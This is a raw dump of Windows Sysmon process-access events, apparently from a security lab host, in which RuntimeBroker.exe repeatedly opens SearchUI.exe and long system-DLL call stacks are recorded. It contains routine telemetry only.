13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
